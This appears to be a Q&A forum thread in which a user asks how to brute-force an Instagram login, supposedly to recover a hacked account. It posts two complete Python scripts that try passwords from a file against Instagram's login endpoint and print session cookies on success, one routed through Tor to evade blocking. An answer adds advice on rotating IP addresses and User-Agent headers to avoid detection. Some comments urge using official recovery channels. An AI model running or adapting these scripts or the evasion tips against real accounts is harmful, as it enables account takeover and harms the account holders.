# Is it possible to do a brute force attack on a hacked Instagram account in order to recover it?

Tags: python, python-requests, instagram

I created a basic script made in Python that uses the Requests library. The code works perfectly, but Instagram blocks after a few attempts because it realizes it's an automated login.
See the code:

```
import requests
from datetime import datetime
import json
from time import sleep


link = 'https://www.instagram.com/accounts/login/'
login_url = 'https://www.instagram.com/accounts/login/ajax/'

response = requests.get(link)
csrf = response.cookies['csrftoken']

time = int(datetime.now().timestamp())


passwords = open('h.txt', 'r')
username = str(input('Enter your username or gmail: '))

for i in passwords:


    time = int(datetime.now().timestamp())
    
    payload = {
        'username': username,
        'enc_password': f'#PWD_INSTAGRAM_BROWSER:0:{time}:{i}',
        'queryParams': {},
        'optIntoOneTap': 'false'
    }

    login_header = {
        "User-Agent": "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36",
        "X-Requested-With": "XMLHttpRequest",
        "Referer": "https://www.instagram.com/accounts/login/",
        "x-csrftoken": csrf
    }

    login_response = requests.post(login_url, data=payload, headers=login_header)
    json_data = json.loads(login_response.text)
    print(json_data)


    if json_data["authenticated"]:
        print("login successful")
        cookies = login_response.cookies
        cookie_jar = cookies.get_dict()
        csrf_token = cookie_jar['csrftoken']
        print("csrf_token: ", csrf_token)
        session_id = cookie_jar['sessionid']
        print("session_id: ", session_id)


    else:
        print("login failed ", login_response.text)
```

Tried using Tor browser based Requests but Instagram recognizes it and doesn't generate 'csrf_token' required for login. I also tried using a VPN but to no avail either.
See the code with the Tor browser:

```
import requests
from datetime import datetime
import json
from time import sleep

session = requests.session()
session.proxies = {}

session.proxies['http'] = 'socks5h://localhost:9050'
session.proxies['https'] = 'socks5h://localhost:9050'

link = 'https://www.instagram.com/accounts/login/'
login_url = 'https://www.instagram.com/accounts/login/ajax/'

response = session.get(link)
csrf = response.cookies['csrftoken']

time = int(datetime.now().timestamp())


passwords = open('h.txt', 'r')
username = str(input('Enter your username or gmail: '))

for i in passwords:


    time = int(datetime.now().timestamp())
    
    payload = {
        'username': username,
        'enc_password': f'#PWD_INSTAGRAM_BROWSER:0:{time}:{i}',
        'queryParams': {},
        'optIntoOneTap': 'false'
    }

    login_header = {
        "User-Agent": "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36",
        "X-Requested-With": "XMLHttpRequest",
        "Referer": "https://www.instagram.com/accounts/login/",
        "x-csrftoken": csrf
    }

    login_response = session.post(login_url, data=payload, headers=login_header)
    json_data = json.loads(login_response.text)
    print(json_data)


    if json_data["authenticated"]:
        print("login successful")
        cookies = login_response.cookies
        cookie_jar = cookies.get_dict()
        csrf_token = cookie_jar['csrftoken']
        print("csrf_token: ", csrf_token)
        session_id = cookie_jar['sessionid']
        print("session_id: ", session_id)


    else:
        print("login failed ", login_response.text)
```

Comment: Contact their support team if you're trying to recover a hacked account. Trying to guess passwords repeatedly, especially when it's a recognizable pattern like trying to attack a specific profile, will either get you rate limited or just blocked outright.

Comment: The thing is, the account has been hacked. But these types of hackers use easy passwords. That's why the brute force attempt is valid.

Comment: Brute force would be valid if you weren't actually doing it against a live system managed by someone else. I'm not saying it's impossible, I'm saying it's not really possible against the entity you're trying this against, and that they have proper channels you can use to recover an account. Meta/Instagram have a lot of detectors in place for stuff that is considered bot/spam activity, and they'll just lock accounts for hours/days if they start seeing activity like what you're doing.

Comment: The contractor works with it, recovering hacked accounts. Yeah... I know, I didn't even think it existed.

Answer (score 1):

I'd imagine making a lot of requests from the same IP address would be flagged by Instagram; if you were somehow able to change IP addresses (and maybe User Agent headers) every few requests, it *might* be possible, but they probably have more measures to prevent this exact type of attack.

You could possibly try using a library like selenium or puppeteer to make sure you're sending the right request, but again, it would probably still be flagged.

Comment: I also think if any company protects themselves from such attacks it would be meta... Because if it would be simple there would be many who would hack Accounts like that.

Comment: So, it's a project for someone. She stated that she works with this and that if her former partner managed to build this code

Comment: However, I think that in addition to the IP address, they can check the abnormal number of attempts to login to an account. So even if I change IP, they can use this criterion

Comment: Using Selenium doesn't help either. After blocking the IP, the login is blocked too and it is not possible to access even manually